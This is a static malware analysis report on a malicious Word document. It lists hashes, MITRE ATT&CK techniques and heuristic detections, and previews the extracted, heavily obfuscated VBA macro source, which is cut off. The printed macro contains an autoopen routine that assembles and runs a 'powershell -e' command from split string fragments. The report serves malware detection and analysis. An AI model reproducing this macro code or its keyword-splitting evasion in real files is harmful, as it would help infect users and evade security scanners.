Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2a083b74b963d4cf…

MALICIOUS

Office (OLE)

204.6 KB Created: 2019-03-13 06:33:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 143857453363d20526c7ec4ccaced19b SHA-1: 56a540d635234dfa40d157c57efc2b91ec3c19fa SHA-256: 2a083b74b963d4cf26db34ee675f3142a7be535da19ddcc1caee23f192bfdda0
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1027 Obfuscated Files or Information

The sample is a malicious Office document containing heavily obfuscated VBA macros. Heuristics indicate the use of legacy auto-exec macros ('autoopen') and a GetObject call, combined with string splitting to reassemble API names like 'Win32_Process'. This suggests the macro's primary purpose is to execute code, likely to download and run a second-stage payload.

Heuristics 8

  • ClamAV: Doc.Malware.Obfuse-6903012-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Obfuse-6903012-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38898 bytes
SHA-256: c256514a34ce2e27f6b8a7c42fd0a1ea3ae123179d4e276ec7aaa8faae214c91
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Z_DABwAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function VQBwDwcA()
   If zAGAGAA = DABAxA Then
LUQAGB = Chr(YXUUAAUA)
zQx1DoA = RABAAGc + ChrW(ZA1AxkXQ) * 441403071 * CBool(808982229) + 641922541 / Round(UUAAAxC) - BAx1D4Q + Sqr(288242007) - 34026037 * CByte(663329497)
wQAAZoDQ = Chr(lUAUAcD)
End If
   If bGAU_4ZA = FxAoAACC Then
j4oAAA = Chr(CUoQ1Q)
LDUA_X1 = tAwAAQAk + ChrW(vA_DAZ) * 423890639 * CBool(216600933) + 37803705 / Round(m1BCC4Q) - XABDAkoB + Sqr(2570903) - 148737031 * CByte(711622087)
jUAA1c = Chr(wAAAkA)
End If
   If JAADUA = zCA1DX Then
nDoAD1AQ = Chr(iAZCQU)
U_Ac44QU = Z_XQBX + ChrW(z4AAUB) * 513305013 * CBool(388723137) + 574423368 / Round(zXB_AAA) - m1ACA41U + Sqr(150227049) - 820400038 * CByte(172219737)
lAwXZQA_ = Chr(wABAAx)
End If
   If UAA_GAD = fAAA4A Then
z1AxxA = Chr(JAAcGBw)
PBAQAAw = LA4oXAG + ChrW(WAAUDA) * 4420613 * CBool(496174223) + 890941101 / Round(TABD4A_) - vBZAUC_ + Sqr(853976039) - 312502796 * CByte(80263922)
oUAQDA = Chr(oQBUAw_)
End If
   If BxQUAAo = lkAAk4 Then
rQ1_ACQc = Chr(sAA4xXC)
hUAAkcw = TBUkGUCB + ChrW(ODAUAx) * 34512621 * CBool(929478521) + 906839506 / Round(lccDUx) - IZQ1GAUw + Sqr(732299348) - 80019840 * CByte(854404928)
qoBAU1B = Chr(C1QAA4)
End If
   If jcBxXA = zDDXAA Then
BAADwDA = Chr(CAAQAB)
VADZA4U = IXD_A_GG + ChrW(IQAQACUA) * 172809488 * CBool(879846461) + 393322782 / Round(GBBBAAw) - PUAAQAAQ + Sqr(135885734) - 118117968 * CByte(953407130)
qZDDBD = Chr(IACGA4)
End If
   If XGBABAXZ = iQk4Do1 Then
E1ZUCxx = Chr(fQAoAAQ)
ZAc1UDGA = H1AAoA + ChrW(wc4ABUU) * 905667836 * CBool(277594522) + 594343910 / Round(pB4AAAQ) - XxXAQAX + Sqr(691490041) - 222841557 * CByte(182350531)
uBQwUA1 = Chr(pDc_AAGB)
End If
End Function
Sub autoopen()
On Error Resume Next
   If dwBxoA = vADDUcXA Then
VAZABAA = Chr(RkAQDCZc)
YAACwU = IDcABDA + ChrW(cQGCoU) * 309152852 * CBool(736654577) + 796353423 / Round(zUAxAQB4) - MAA_cU + Sqr(947806355) - 687440721 * CByte(531962725)
oAC_UD4Q = Chr(XwcAAX)
End If
   If mZABB4UG = jw1Q1AD Then
c_AoDwU = Chr(HAQ1wD)
iQ4A1QAU = L4DoAB_A + ChrW(jBAAU1) * 540009372 * CBool(782235021) + 591577056 / Round(KcA_4D) - z4AAZX + Sqr(272880954) - 38603764 * CByte(269958936)
r_4_AD = Chr(FxcxkAU)
End If
   If TxZ_XA = UXQckAZ1 Then
FZB_AAc = Chr(zCQk4B4B)
F4XkGB = XcCACAU + ChrW(iA1o_QBA) * 869732570 * CBool(858981997) + 78957533 / Round(aGBAoAA) - uAcQGowx + Sqr(93901263) - 718527163 * CByte(609434160)
iG1AA4 = Chr(loUxZ1XQ)
End If
HA1GUAw (UA_B_QU + "po" + FcAAADU_ + "wersh" + aXDAAQA + "ell -e " + kAAADo + zAQA1AZG + lQADQcCx + PX4QAk + v1U_AA)
   If hADDCZ = l1AxcUD Then
dDBoAxAc = Chr(Wc4CBDD)
JQAUkAAw = IAAAAA1 + ChrW(uoAkcB) * 292547635 * CBool(506784403) + 124428572 / Round(jAUwAXG) - lUAQBQAA + Sqr(331785275) - 673498215 * CByte(225199787)
vDCoAA = Chr(hCAAUAAU)
End If
   If Y4UAAX = vDAZCcAB Then
FAAQZ41 = Chr(jA41DAAB)
XUAAxQ = wBAUUC + ChrW(o1UDAA) * 62748113 * CBool(185621211) + 993303228 / Round(oDQkkU) - jXcxxw + Sqr(545003774) - 309160441 * CByte(254346241)
bABACQ = Chr(K1AAAB)
End If
End Sub
Function JAQUXGAD()
   If pBQAU4 = CUBDk4AA Then
zDUACxU = Chr(aCcBXA)
cBQADU = jXxAxAw + ChrW(WDQoAZC) * 832897663 * CBool(536175857) + 71052654 / Round(tD4cZA) - QAGA1AA + Sqr(678893028) - 830091208 * CByte(34998790)
i1AA4wAA = Chr(qA_QAB)
End If
   If IkUU1xA4 = DG1QZUBX Then
oAAAQD1Q = Chr(ZAC_1A)
doBAA4oG = bZkBAU + ChrW(iACAA4k) * 436287623 * CBool(193685541) + 752477889 / Round(LAkB4UAU) - okQAccXA + Sqr(256634284) - 541230560 * CByte(413618082)
KQAAcAA = Chr(vxADDA)
End If
   If jAcAUAxU = zQAAQGQc Then
TQGZZBG = Chr(tGABBDAc)
sxA1UAAD = dAA4QDB + ChrW(cBkGCk1) * 722642096 * CBool(682659876) + 370235955 / Round(jBxQZU_A) - KxUXww + Sqr(649890319) - 304389757 * CByte(210070511)
ZAkUDU = Chr(fAcBCo)
End If
   If jDkAAUGX = KAkB_QxU Then
kDA
... (truncated)